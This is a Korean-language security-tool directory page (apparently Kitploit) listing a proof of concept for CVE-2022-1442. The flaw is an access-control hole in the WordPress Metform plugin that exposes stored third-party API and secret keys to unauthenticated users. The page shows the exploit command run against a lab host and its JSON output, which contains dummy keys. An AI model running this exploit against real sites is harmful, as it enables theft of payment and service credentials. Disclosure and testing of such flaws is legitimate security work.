Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-1442 — WordPress 플러그인 Metform <= 2.1.3 - 부적절한 접근 제어로 인한 인증되지 않은 민감 정보 노출 | Kitploit
도구/GitHubGitHub/randomrobbiebf/cve-2022-1442
Vulnerability AnalysisExploitationInformation GatheringWeb SecurityPenetration TestingMisconfiguration
GitHubrandomrobbiebf/cve-2022-1442

CVE-2022-1442

WordPress 플러그인 Metform <= 2.1.3 - 부적절한 접근 제어로 인한 인증되지 않은 민감 정보 노출

저장소 보기
23년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-1442

WordPress 플러그인 Metform <= 2.1.3 - 부적절한 접근 제어로 인증되지 않은 사용자의 민감한 정보 노출 허용

설명

이 플러그인은 ~/core/forms/action.php 파일의 부적절한 접근 제어로 인해 민감한 정보가 노출되는 취약점이 있습니다. 이는 인증되지 않은 공격자가 PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA 등 통합된 타사 API의 모든 API 키와 비밀 키를 볼 수 있도록 악용될 수 있습니다.

POC

root@kitploit:~
 bash metform.sh http://wordpress.lan
{
  "form_title": "New Form # 1691056894",
  "success_message": "Thank you! Form submitted successfully.",
  "capture_user_browser_data": "1",
  "store_entries": "1",
  "entry_title": "Entry # [mf_id]",
  "count_views": "1",
  "redirect_to": "",
  "user_email_subject": "",
  "user_email_from": "",
  "user_email_reply_to": "",
  "user_email_body": "",
  "admin_email_subject": "",
  "admin_email_to": "",
  "admin_email_from": "",
  "admin_email_reply_to": "",
  "admin_email_body": "",
  "mf_mailchimp_list_id": "",
  "mf_slack_webhook": "",
  "mf_recaptcha_version": "recaptcha-v2",
  "mf_recaptcha_site_key": "sfsdffd",
  "mf_recaptcha_secret_key": "sfddsf",
  "mf_recaptcha_site_key_v3": "",
  "mf_recaptcha_secret_key_v3": "",
  "mf_mailchimp_api_key": "asdadasdsaddas",
  "input_names": "Example: [mf-inputname]",
  "ckit_opt": [],
  "aweber_opt": [],
  "mp_opt": []
}
도구 다운로드